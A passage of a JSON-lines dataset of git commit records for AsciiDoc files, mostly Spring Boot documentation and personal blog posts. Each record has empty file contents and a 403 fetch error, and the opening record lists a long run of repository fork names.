jbovet\/spring-boot,VitDevelop\/spring-boot,simonnordberg\/spring-boot,ydsakyclguozi\/spring-boot,afroje-reshma\/spring-boot-sample,mohican0607\/spring-boot,ApiSecRay\/spring-boot,ralenmandao\/spring-boot,ameraljovic\/spring-boot,smayoorans\/spring-boot,mbnshankar\/spring-boot,vandan16\/Vandan,mosoft521\/spring-boot,duandf35\/spring-boot,nelswadycki\/spring-boot,lingounet\/spring-boot,xwjxwj30abc\/spring-boot,DeezCashews\/spring-boot,fjlopez\/spring-boot,mackeprm\/spring-boot,qq83387856\/spring-boot,zhangshuangquan\/spring-root,deki\/spring-boot,krmcbride\/spring-boot,mdeinum\/spring-boot,166yuan\/spring-boot,end-user\/spring-boot,huangyugui\/spring-boot,vakninr\/spring-boot,jayeshmuralidharan\/spring-boot,gauravbrills\/spring-boot,yunbian\/spring-boot,hehuabing\/spring-boot,meloncocoo\/spring-boot,minmay\/spring-boot,mbenson\/spring-boot,Buzzardo\/spring-boot,mebinjacob\/spring-boot,auvik\/spring-boot,akmaharshi\/jenkins,Chomeh\/spring-boot,nelswadycki\/spring-boot,smilence1986\/spring-boot,yunbian\/spring-boot,Makhlab\/spring-boot,MrMitchellMoore\/spring-boot,ptahchiev\/spring-boot,marcellodesales\/spring-boot,eric-stanley\/spring-boot,fireshort\/spring-boot,5zzang\/spring-boot,fulvio-m\/spring-boot,buobao\/spring-boot,lucassaldanha\/spring-boot,frost2014\/spring-boot,johnktims\/spring-boot,AngusZhu\/spring-boot,mrumpf\/spring-boot,JiweiWong\/spring-boot,gauravbrills\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cbtpro\/spring-boot,navarrogabriela\/spring-boot,mbnshankar\/spring-boot,existmaster\/spring-boot,balajinsr\/spring-boot,shangyi0102\/spring-boot,navarrogabriela\/spring-boot,auvik\/spring-boot,fjlopez\/spring-boot,minmay\/spring-boot,kayelau\/spring-boot,mbnshankar\/spring-boot,playleud\/spring-boot,jack-luj\/spring-boot,hklv\/spring-boot,scottfrederick\/spring-boot,drunklite\/spring-boot,donthadineshkumar\/spring-boot,lexandro\/spring-boot,SaravananParthasarathy\/SPSDemo,PraveenkumarShethe\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,na-na\/spring-boot,huangyugui\/spring-boot,forestqqqq\/spring-boot,drunklite\/spring-boot,damoyang\/spring-boot,lenicliu\/spring-boot,Xaerxess\/spring-boot,eliudiaz\/spring-boot,ralenmandao\/spring-boot,hklv\/spring-boot,jayarampradhan\/spring-boot,rizwan18\/spring-boot,rams2588\/spring-boot,ChunPIG\/spring-boot,linead\/spring-boot,Charkui\/spring-boot,mouadtk\/spring-boot,paddymahoney\/spring-boot,ihoneymon\/spring-boot,gorcz\/spring-boot,mdeinum\/spring-boot,deki\/spring-boot,vandan16\/Vandan,ojacquemart\/spring-boot,axibase\/spring-boot,sungha\/spring-boot,M3lkior\/spring-boot,axelfontaine\/spring-boot,trecloux\/spring-boot,cbtpro\/spring-boot,afroje-reshma\/spring-boot-sample,existmaster\/spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,coolcao\/spring-boot,orangesdk\/spring-boot,paweldolecinski\/spring-boot,fogone\/spring-boot,navarrogabriela\/spring-boot,M3lkior\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mbnshankar\/spring-boot,rams2588\/spring-boot,liupd\/spring-boot,brettwooldridge\/spring-boot,wwadge\/spring-boot,bsodzik\/spring-boot,yhj630520\/spring-boot,5zzang\/spring-boot,shakuzen\/spring-boot,SaravananParthasarathy\/SPSDemo,pnambiarsf\/spring-boot,lif123\/spring-boot,lingounet\/spring-boot,cmsandiga\/spring-boot,eonezhang\/spring-boot,ydsakyclguozi\/spring-boot,felipeg48\/spring-boot,duandf35\/spring-boot,axibase\/spring-boot,sankin\/spring-boot,clarklj001\/spring-boot,clarklj001\/spring-boot,bsodz
ik\/spring-boot,izestrea\/spring-boot,patrikbeno\/spring-boot,npcode\/spring-boot,mouadtk\/spring-boot,tan9\/spring-boot,mbogoevici\/spring-boot,christian-posta\/spring-boot,DONIKAN\/spring-boot,kdvolder\/spring-boot,smilence1986\/spring-boot,ameraljovic\/spring-boot,fulvio-m\/spring-boot,shakuzen\/spring-boot,duandf35\/spring-boot,bsodzik\/spring-boot,crackien\/spring-boot,ApiSecRay\/spring-boot,kiranbpatil\/spring-boot,sankin\/spring-boot,isopov\/spring-boot,yangdd1205\/spring-boot,yunbian\/spring-boot,mohican0607\/spring-boot,sbuettner\/spring-boot,eddumelendez\/spring-boot,xingguang2013\/spring-boot,lburgazzoli\/spring-boot,wilkinsona\/spring-boot,mabernardo\/spring-boot,bbrouwer\/spring-boot,satheeshmb\/spring-boot,rweisleder\/spring-boot,na-na\/spring-boot,michael-simons\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,olivergierke\/spring-boot,izeye\/spring-boot,cmsandiga\/spring-boot,prasenjit-net\/spring-boot,drumonii\/spring-boot,fogone\/spring-boot,RichardCSantana\/spring-boot,JiweiWong\/spring-boot,mabernardo\/spring-boot,liupugong\/spring-boot,Charkui\/spring-boot,jvz\/spring-boot,pvorb\/spring-boot,krmcbride\/spring-boot,ilayaperumalg\/spring-boot,nghiavo\/spring-boot,herau\/spring-boot,i007422\/jenkins2-course-spring-boot,yuxiaole\/spring-boot,mosen11\/spring-boot,mackeprm\/spring-boot,joshiste\/spring-boot,sankin\/spring-boot,afroje-reshma\/spring-boot-sample,jorgepgjr\/spring-boot,olivergierke\/spring-boot,marcellodesales\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,qerub\/spring-boot,fireshort\/spring-boot,trecloux\/spring-boot,vandan16\/Vandan,M3lkior\/spring-boot,mbogoevici\/spring-boot,imranansari\/spring-boot,joshiste\/spring-boot,sbuettner\/spring-boot,vakninr\/spring-boot,axelfontaine\/spring-boot,sbcoba\/spring-boot,balajinsr\/spring-boot,damoyang\/spring-boot,yuxiaole\/spring-boot,hqrt\/jenkins2-course-spring-boot,Makhlab\/spring-boot,chrylis\/spring-boot,yuxiaole\/spring-boot,smayoorans\/spring-boot,izeye\/spring-boot,NetoDevel\/spring-boot,MrMitchellMoore\/spring-boot,tiarebalbi\/spring-boot,vaseemahmed01\/spring-boot,Chomeh\/spring-boot,liupd\/spring-boot,nghialunhaiha\/spring-boot,mbrukman\/spring-boot,roymanish\/spring-boot,izeye\/spring-boot,rweisleder\/spring-boot,hehuabing\/spring-boot,michael-simons\/spring-boot,jorgepgjr\/spring-boot,durai145\/spring-boot,bbrouwer\/spring-boot,eliudiaz\/spring-boot,drunklite\/spring-boot,roymanish\/spring-boot,AngusZhu\/spring-boot,JiweiWong\/spring-boot,felipeg48\/spring-boot,huangyugui\/spring-boot,kamilszymanski\/spring-boot,michael-simons\/spring-boot,habuma\/spring-boot,Makhlab\/spring-boot,liupd\/spring-boot,tsachev\/spring-boot,xc145214\/spring-boot,mbogoevici\/spring-boot,nghialunhaiha\/spring-boot,keithsjohnson\/spring-boot,mbrukman\/spring-boot,jayeshmuralidharan\/spring-boot,vpavic\/spring-boot,snicoll\/spring-boot,vandan16\/Vandan,mackeprm\/spring-boot,minmay\/spring-boot,crackien\/spring-boot,javyzheng\/spring-boot,bclozel\/spring-boot,frost2014\/spring-boot,mosen11\/spring-boot,mlc0202\/spring-boot,chrylis\/spring-boot,artembilan\/spring-boot,candrews\/spring-boot,hehuabing\/spring-boot,lif123\/spring-boot,philwebb\/spring-boot-concourse,AngusZhu\/spring-boot,nevenc-pivotal\/spring-boot,jcastaldoFoodEssentials\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot-concourse,imranansari\/spring-boot,166yuan\/spring-boot,izestrea\/spring-boot,jcastaldoFoodEssentials\/spring-boot,5zzang\/spring-boot,xiaoleiPENG\/my-projec
t,wwadge\/spring-boot,gregturn\/spring-boot,wilkinsona\/spring-boot,lenicliu\/spring-boot,mike-kukla\/spring-boot,AstaTus\/spring-boot,zhanhb\/spring-boot,kayelau\/spring-boot,lokbun\/spring-boot,hqrt\/jenkins2-course-spring-boot,nghiavo\/spring-boot,shangyi0102\/spring-boot,RishikeshDarandale\/spring-boot,hklv\/spring-boot,RishikeshDarandale\/spring-boot,kamilszymanski\/spring-boot,xdweleven\/spring-boot,lucassaldanha\/spring-boot,Xaerxess\/spring-boot,vaseemahmed01\/spring-boot,DeezCashews\/spring-boot,javyzheng\/spring-boot,frost2014\/spring-boot,kiranbpatil\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,SaravananParthasarathy\/SPSDemo,mevasaroj\/jenkins2-course-spring-boot,bsodzik\/spring-boot,hello2009chen\/spring-boot,bclozel\/spring-boot,jack-luj\/spring-boot,wwadge\/spring-boot,dfa1\/spring-boot,artembilan\/spring-boot,mike-kukla\/spring-boot,zorosteven\/spring-boot,AngusZhu\/spring-boot,coolcao\/spring-boot,NetoDevel\/spring-boot,patrikbeno\/spring-boot,duandf35\/spring-boot,kayelau\/spring-boot,10045125\/spring-boot,Pokbab\/spring-boot,allyjunio\/spring-boot,hklv\/spring-boot,sungha\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,srinivasan01\/spring-boot,johnktims\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,tsachev\/spring-boot,ractive\/spring-boot,crackien\/spring-boot,durai145\/spring-boot,neo4j-contrib\/spring-boot,RainPlanter\/spring-boot,bbrouwer\/spring-boot,habuma\/spring-boot,Chomeh\/spring-boot,forestqqqq\/spring-boot,axelfontaine\/spring-boot,ollie314\/spring-boot,liupd\/spring-boot,lburgazzoli\/spring-boot,Pokbab\/spring-boot,mosoft521\/spring-boot,paweldolecinski\/spring-boot,ptahchiev\/spring-boot,hehuabing\/spring-boot,nandakishorm\/spring-boot,AngusZhu\/spring-boot,nareshmiriyala\/spring-boot,liupugong\/spring-boot,RishikeshDarandale\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,RainPlanter\/spring-boot,cmsandiga\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,PraveenkumarShethe\/spring-boot,NetoDevel\/spring-boot,okba1\/spring-boot,smayoorans\/spring-boot,jjankar\/spring-boot,aahlenst\/spring-boot,MasterRoots\/spring-boot,peteyan\/spring-boot,mbnshankar\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,smayoorans\/spring-boot,habuma\/spring-boot,gorcz\/spring-boot,satheeshmb\/spring-boot,meloncocoo\/spring-boot,royclarkson\/spring-boot,xc145214\/spring-boot,Buzzardo\/spring-boot,tbbost\/spring-boot,okba1\/spring-boot,rstirling\/spring-boot,srikalyan\/spring-boot,jrrickard\/spring-boot,coolcao\/spring-boot,eric-stanley\/spring-boot,navarrogabriela\/spring-boot,sebastiankirsch\/spring-boot,neo4j-contrib\/spring-boot,dreis2211\/spring-boot,sbcoba\/spring-boot,meftaul\/spring-boot,jbovet\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,damoyang\/spring-boot,olivergierke\/spring-boot,panbiping\/spring-boot,bbrouwer\/spring-boot,drumonii\/spring-boot,xwjxwj30abc\/spring-boot,jbovet\/spring-boot,tiarebalbi\/spring-boot,166yuan\/spring-boot,xdweleven\/spring-boot,ptahchiev\/spring-boot,lenicliu\/spring-boot,sungha\/spring-boot,ractive\/spring-boot,okba1\/spring-boot,i007422\/jenkins2-course-spring-boot,raiamber1\/spring-boot,nisuhw\/spring-boot,prakashme\/spring-boot,coolcao\/spring-boot,soul2zimate\/spring-boot,playleud\/spring-boot,SaravananParthasarathy\/SPSDemo,xialeizhou\/spring-boot,mrumpf\/spring-boot,fogone\/spring-boot,i007422\/jenkins2-course-spring-boot,huang
yugui\/spring-boot,fulvio-m\/spring-boot,kamilszymanski\/spring-boot,smilence1986\/spring-boot,lcardito\/spring-boot,artembilan\/spring-boot,pnambiarsf\/spring-boot,AstaTus\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,nurkiewicz\/spring-boot,nevenc-pivotal\/spring-boot,master-slave\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,xc145214\/spring-boot,michael-simons\/spring-boot,rmoorman\/spring-boot,jorgepgjr\/spring-boot,gorcz\/spring-boot,buobao\/spring-boot,ojacquemart\/spring-boot,murilobr\/spring-boot,nghialunhaiha\/spring-boot,nevenc-pivotal\/spring-boot,jforge\/spring-boot,habuma\/spring-boot,Pokbab\/spring-boot,ilayaperumalg\/spring-boot,soul2zimate\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,imranansari\/spring-boot,eric-stanley\/spring-boot,izeye\/spring-boot,christian-posta\/spring-boot,dreis2211\/spring-boot,orangesdk\/spring-boot,herau\/spring-boot,srinivasan01\/spring-boot,drumonii\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,sbcoba\/spring-boot,ydsakyclguozi\/spring-boot,mosoft521\/spring-boot,damoyang\/spring-boot,bijukunjummen\/spring-boot,roberthafner\/spring-boot,DeezCashews\/spring-boot,christian-posta\/spring-boot,keithsjohnson\/spring-boot,mrumpf\/spring-boot,johnktims\/spring-boot,domix\/spring-boot,navarrogabriela\/spring-boot,habuma\/spring-boot,dfa1\/spring-boot,Nowheresly\/spring-boot,rickeysu\/spring-boot,sbcoba\/spring-boot,MasterRoots\/spring-boot,mebinjacob\/spring-boot,xwjxwj30abc\/spring-boot,huangyugui\/spring-boot,eddumelendez\/spring-boot,gauravbrills\/spring-boot,DONIKAN\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,smilence1986\/spring-boot,lokbun\/spring-boot,Buzzardo\/spring-boot,jeremiahmarks\/spring-boot,tiarebalbi\/spring-boot,xingguang2013\/spring-boot,aahlenst\/spring-boot,tsachev\/spring-boot,zhangshuangquan\/spring-root,MrMitchellMoore\/spring-boot,nelswadycki\/spring-boot,roberthafner\/spring-boot,yhj630520\/spring-boot,kdvolder\/spring-boot,Xaerxess\/spring-boot,dfa1\/spring-boot,jmnarloch\/spring-boot,paddymahoney\/spring-boot,ChunPIG\/spring-boot,kiranbpatil\/spring-boot,herau\/spring-boot,mbrukman\/spring-boot,deki\/spring-boot,mrumpf\/spring-boot,jxblum\/spring-boot,allyjunio\/spring-boot,mike-kukla\/spring-boot,pvorb\/spring-boot,npcode\/spring-boot,axibase\/spring-boot,herau\/spring-boot,jcastaldoFoodEssentials\/spring-boot,srikalyan\/spring-boot,nareshmiriyala\/spring-boot,bjornlindstrom\/spring-boot,balajinsr\/spring-boot,joshiste\/spring-boot,donthadineshkumar\/spring-boot,kamilszymanski\/spring-boot,buobao\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ChunPIG\/spring-boot,rweisleder\/spring-boot,nurkiewicz\/spring-boot,minmay\/spring-boot,wwadge\/spring-boot,spring-projects\/spring-boot,qerub\/spring-boot,srikalyan\/spring-boot,sbuettner\/spring-boot,pnambiarsf\/spring-boot,auvik\/spring-boot,jayeshmuralidharan\/spring-boot,rmoorman\/spring-boot,domix\/spring-boot,xialeizhou\/spring-boot,meloncocoo\/spring-boot,mike-kukla\/spring-boot,mosen11\/spring-boot,ojacquemart\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,lif123\/spring-boot,jjankar\/spring-boot,RishikeshDarandale\/spring-boot,meftaul\/spring-boot,zhangshuangquan\/spring-root,jeremiahmarks\/spring-boot,meftaul\/spring-boot,playleud\/spring-boot,vakninr\/spring-boot,jrrickard\/spring-boot,htynkn\/spring-boot,jrrickard\/spring-boot,qq83387856\/spring-boot,lcardito\/spring-boot,RobertNickens\/spring-boot,NetoDevel\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,liupugong\/spring-boo
t,vpavic\/spring-boot,bjornlindstrom\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,Chomeh\/spring-boot,lingounet\/spring-boot,rmoorman\/spring-boot,durai145\/spring-boot,durai145\/spring-boot,i007422\/jenkins2-course-spring-boot,fjlopez\/spring-boot,Charkui\/spring-boot,mabernardo\/spring-boot,johnktims\/spring-boot,thomasdarimont\/spring-boot,krmcbride\/spring-boot,166yuan\/spring-boot,PraveenkumarShethe\/spring-boot,rstirling\/spring-boot,ihoneymon\/spring-boot,lburgazzoli\/spring-boot,mohican0607\/spring-boot,rickeysu\/spring-boot,damoyang\/spring-boot,hqrt\/jenkins2-course-spring-boot,trecloux\/spring-boot,murilobr\/spring-boot,jeremiahmarks\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,srinivasan01\/spring-boot,frost2014\/spring-boot,lingounet\/spring-boot,vaseemahmed01\/spring-boot,srinivasan01\/spring-boot,kayelau\/spring-boot,VitDevelop\/spring-boot,chrylis\/spring-boot,rmoorman\/spring-boot,RainPlanter\/spring-boot,rizwan18\/spring-boot,murilobr\/spring-boot,soul2zimate\/spring-boot,pnambiarsf\/spring-boot,qq83387856\/spring-boot,dnsw83\/spring-boot,DONIKAN\/spring-boot,qq83387856\/spring-boot,joansmith\/spring-boot,paweldolecinski\/spring-boot,chrylis\/spring-boot,isopov\/spring-boot,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,fogone\/spring-boot,SPNilsen\/spring-boot,nelswadycki\/spring-boot,rstirling\/spring-boot,afroje-reshma\/spring-boot-sample,forestqqqq\/spring-boot,johnktims\/spring-boot,jvz\/spring-boot,jmnarloch\/spring-boot,pnambiarsf\/spring-boot,meftaul\/spring-boot,SPNilsen\/spring-boot,AstaTus\/spring-boot,joshthornhill\/spring-boot,Nowheresly\/spring-boot,mlc0202\/spring-boot,gauravbrills\/spring-boot,tbadie\/spring-boot,royclarkson\/spring-boot,Nowheresly\/spring-boot,nurkiewicz\/spring-boot,liupugong\/spring-boot,RobertNickens\/spring-boot,gregturn\/spring-boot,lenicliu\/spring-boot,prasenjit-net\/spring-boot,patrikbeno\/spring-boot,felipeg48\/spring-boot,allyjunio\/spring-boot,fireshort\/spring-boot,eric-stanley\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,prakashme\/spring-boot,ralenmandao\/spring-boot,brettwooldridge\/spring-boot,JiweiWong\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,VitDevelop\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,roberthafner\/spring-boot,imranansari\/spring-boot,jjankar\/spring-boot,npcode\/spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,rweisleder\/spring-boot,nghiavo\/spring-boot,fireshort\/spring-boot,rams2588\/spring-boot,mdeinum\/spring-boot,xialeizhou\/spring-boot,RainPlanter\/spring-boot,keithsjohnson\/spring-boot,end-user\/spring-boot,jmnarloch\/spring-boot,scottfrederick\/spring-boot,spring-projects\/spring-boot,jmnarloch\/spring-boot,yunbian\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,sankin\/spring-boot,brettwooldridge\/spring-boot,mouadtk\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,gorcz\/spring-boot,lokbun\/spring-boot,javyzheng\/spring-boot,SPNilsen\/spring-boot,lokbun\/spring-boot,SPNilsen\/spring-boot,master-slave\/spring-boot,jforge\/spring-boot,tsachev\/spring-boot,nandakishorm\/spring-boot,xdweleven\/spring-boot,nebhale\/spring-boot,drunklite\/spring-boot,joshiste\/spring-boot,mlc0202\/spring-boot,xiaoleiPENG\/my-project,neo4j-contrib\/spring-boot,end-user\/spring-boot,MrMitchellMoore\/spring-boot,deki\/spring-boot,satheeshmb\/spring-boot,xc145214\/spring-boot,tan9\/spring-boot,VitDevelop\/spring-boot,jorgepgjr\/spring-boot,spring-projects\/spring-boot,Buzzardo
\/spring-boot,buobao\/spring-boot,prasenjit-net\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,jayeshmuralidharan\/spring-boot,tbadie\/spring-boot,Nowheresly\/spring-boot,ojacquemart\/spring-boot,xiaoleiPENG\/my-project,sbuettner\/spring-boot,existmaster\/spring-boot,patrikbeno\/spring-boot,hello2009chen\/spring-boot,RobertNickens\/spring-boot,RishikeshDarandale\/spring-boot,kdvolder\/spring-boot,Xaerxess\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,VitDevelop\/spring-boot,jforge\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,candrews\/spring-boot,domix\/spring-boot,jbovet\/spring-boot,balajinsr\/spring-boot,gregturn\/spring-boot,crackien\/spring-boot,paddymahoney\/spring-boot,simonnordberg\/spring-boot,htynkn\/spring-boot,end-user\/spring-boot,panbiping\/spring-boot,zorosteven\/spring-boot,PraveenkumarShethe\/spring-boot,thomasdarimont\/spring-boot,orangesdk\/spring-boot,lucassaldanha\/spring-boot,panbiping\/spring-boot,eliudiaz\/spring-boot,ollie314\/spring-boot,wilkinsona\/spring-boot,mrumpf\/spring-boot,donthadineshkumar\/spring-boot,bjornlindstrom\/spring-boot,simonnordberg\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,SPNilsen\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,srinivasan01\/spring-boot,auvik\/spring-boot,jrrickard\/spring-boot,nebhale\/spring-boot,jxblum\/spring-boot,brettwooldridge\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,mlc0202\/spring-boot,bijukunjummen\/spring-boot,olivergierke\/spring-boot,raiamber1\/spring-boot,jforge\/spring-boot,M3lkior\/spring-boot,krmcbride\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,nisuhw\/spring-boot,yuxiaole\/spring-boot,christian-posta\/spring-boot,peteyan\/spring-boot,christian-posta\/spring-boot,DeezCashews\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,Chomeh\/spring-boot,simonnordberg\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,clarklj001\/spring-boot,yuxiaole\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,npcode\/spring-boot,royclarkson\/spring-boot,ractive\/spring-boot,prakashme\/spring-boot,jayarampradhan\/spring-boot,nisuhw\/spring-boot,marcellodesales\/spring-boot,tiarebalbi\/spring-boot,keithsjohnson\/spring-boot,joshthornhill\/spring-boot,designreuse\/spring-boot,xwjxwj30abc\/spring-boot,jorgepgjr\/spring-boot,rickeysu\/spring-boot,royclarkson\/spring-boot,orangesdk\/spring-boot,ilayaperumalg\/spring-boot,zorosteven\/spring-boot,AstaTus\/spring-boot,linead\/spring-boot,eric-stanley\/spring-boot,frost2014\/spring-boot,xingguang2013\/spring-boot,jayeshmuralidharan\/spring-boot,PraveenkumarShethe\/spring-boot,prakashme\/spring-boot,ihoneymon\/spring-boot,mbenson\/spring-boot,na-na\/spring-boot,roymanish\/spring-boot,lcardito\/spring-boot,kiranbpatil\/spring-boot,xingguang2013\/spring-boot,akmaharshi\/jenkins,fulvio-m\/spring-boot,satheeshmb\/spring-boot,axibase\/spring-boot,ralenmandao\/spring-boot,eliudiaz\/spring-boot,axelfontaine\/spring-boot,herau\/spring-boot,tbbost\/spring-boot,designreuse\/spring-boot,na-na\/spring-boot,durai145\/spring-boot,smilence1986\/spring-boot,DONIKAN\/spring-boot,isopov\/spring-boot,nareshmiriyala\/spring-boot,izestrea\/spring-boot,roymanish\/spring-boot,kayelau\/spring-boot,eddumelendez\/spring-boot,5zzang\/spring-boot,mabernardo\/spring-boot,prakashme\/spring-boot,rstirling\/spring-boot,sbcoba\/spring-boot,jcastaldoFoodEssentials\/spring-boot,nandakishorm\/spring-boot,SaravananParthasarathy\/SPSDemo,
fulvio-m\/spring-boot,ChunPIG\/spring-boot,sungha\/spring-boot,eliudiaz\/spring-boot,keithsjohnson\/spring-boot,donthadineshkumar\/spring-boot,philwebb\/spring-boot,panbiping\/spring-boot,hklv\/spring-boot,mdeinum\/spring-boot,mabernardo\/spring-boot,rstirling\/spring-boot,lingounet\/spring-boot,xialeizhou\/spring-boot,drumonii\/spring-boot,balajinsr\/spring-boot,nevenc-pivotal\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,rams2588\/spring-boot,Buzzardo\/spring-boot,jeremiahmarks\/spring-boot,cmsandiga\/spring-boot,philwebb\/spring-boot-concourse,mbrukman\/spring-boot,10045125\/spring-boot,drunklite\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,murilobr\/spring-boot,jjankar\/spring-boot,rizwan18\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,end-user\/spring-boot,ollie314\/spring-boot,wwadge\/spring-boot,okba1\/spring-boot,zhanhb\/spring-boot,donthadineshkumar\/spring-boot,zorosteven\/spring-boot,yunbian\/spring-boot,joansmith\/spring-boot,dfa1\/spring-boot,Nowheresly\/spring-boot,xdweleven\/spring-boot,RichardCSantana\/spring-boot,M3lkior\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,forestqqqq\/spring-boot,MasterRoots\/spring-boot,krmcbride\/spring-boot,jmnarloch\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soul2zimate\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0aefc8b4772730cea32fe5034c5389481078db1d","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53529597df5a56657cf2199554cd06951632f5d8","subject":"Update 2017-01-22-Customer-Segments.adoc","message":"Update 2017-01-22-Customer-Segments.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-22-Customer-Segments.adoc","new_file":"_posts\/2017-01-22-Customer-Segments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1759e0c126eebc61e5c2c17a7cdd9d0441520dc2","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"060b0efc2cc8a6b43094c06d030d21202c4bf41a","subject":"Add 
initial API doc draft","message":"Add initial API doc draft\n","repos":"huskydocs\/api","old_file":"api.asciidoc","new_file":"api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huskydocs\/api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6c29f2cf5df42a34e86055900484a4e76d44cd","subject":"Update 2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","message":"Update 2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","new_file":"_posts\/2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aa8bff05aa6e5d6d3aab38aaab25566ac3000f8","subject":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","message":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6770d422074157ee0b1eaa9890329959eac59ca7","subject":"Update language in Compiling.adoc","message":"Update language in 